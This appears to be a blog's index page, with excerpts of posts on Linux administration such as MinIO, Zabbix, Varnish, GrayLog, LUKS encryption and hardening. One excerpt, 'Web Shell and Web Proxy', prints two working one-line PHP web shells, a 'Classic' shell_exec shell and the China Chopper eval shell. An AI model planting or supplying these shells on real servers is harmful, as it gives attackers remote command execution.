In this blog, I will share ideas and concepts that worked for me and I hope will work for you […]
Deploying an S3 Compatible Block Storage Server with MinIO
MinIO [Link] is an open source [Link] high performance object storage API written in GO compatible with Amazon S3 cloud […]
Web Shell and Web Proxy
WEB SHELLS Classic <?php echo shell_exec($_GET[“cmd”]);?> China Chopper <?php @eval($_POST[‘password’]);?> WEB PROXY Open source options: PHPProxy (discontinued) – Source code […]
Setting Up a Zabbix Monitoring Server on Ubuntu 20.04
Zabbix is an infrastructure monitoring tool. It is a powerful open-source and capable of monitoring servers, applications, services, network devices, […]
Installing CMS Made Simple on Ubuntu 20.04
It is an open source Content Management System (CMS) written in PHP with MySQL/MariaDB that provides developers and site owners […]
Setting Up a Private CDN with Varnish HTTP Cache on Ubuntu
Varnish HTTP Cache is a dedicated opensource application for caching HTTP requests made by the client to the server. It […]
Setting Up a Centralized Log Server with GrayLog on Ubuntu 20.04
GrayLog is a powerful free open source centralized log management solution for capturing, storing, and enabling real-time analysis. It is […]
Linux Log Management and Audit
INDEX Journal Control Used to view and manipulate Systemd logs. Remote Syslog Forwards log messages over an IP network. Log […]
Managing Partitions from the Command Line
Checking the drives attached to the Linux server or workstation. mount shows all mounted partitions. note that it contains much […]
How to Encrypt Partitions with LUKS
Linux Unified Key Setup (LUKS) is an utility for disk encryption based on the DMCrypt kernel module. It is not […]
Linux Hardening Guide
This guide lists essential considerations to harden (enhance) a Linux server to reduce the attack surface, reduce the impact or […]